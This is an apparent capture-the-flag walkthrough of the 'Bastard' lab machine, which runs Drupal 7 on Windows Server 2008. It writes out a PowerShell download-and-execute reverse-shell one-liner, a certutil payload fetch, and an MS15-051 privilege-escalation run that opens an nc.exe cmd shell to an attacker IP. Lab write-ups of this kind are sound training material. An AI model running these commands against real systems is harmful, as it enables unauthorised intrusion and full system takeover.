Bastard

Created At: Updated At:

Recon

$nmap -p- -A 10.129.139.175
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-14 15:27 UTC
Nmap scan report for 10.129.139.175
Host is up (0.032s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-title: Welcome to Bastard | Bastard
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Drupal CMS welcomes us on port 80.

We can grab it’s version by going to /CHANGELOG.TXT.

Checing it with NIST, we can see that it has juicy 9.8 Critical CVE.

We can find then PoC of the exploit on github.

We can get reverse shell using Invoke-PowerShellTcp.ps1

powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.66.152:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.66.152 -Port 4242

Privilage escalation

It’s vanilla windows 2008 server, so we can run exec exploiting MS15-051.

We can send it over using http-server again, and get it using certutil.exe -urlcache -split -f http://10.10.16.21/ms15-051x64.exe ms15-051x64.exe.

It works, so we can get reverse shell with admin, by sending over nc and running ".\ms15-051x64.exe “nc.exe -e cmd.exe 10.10.16.21 5555”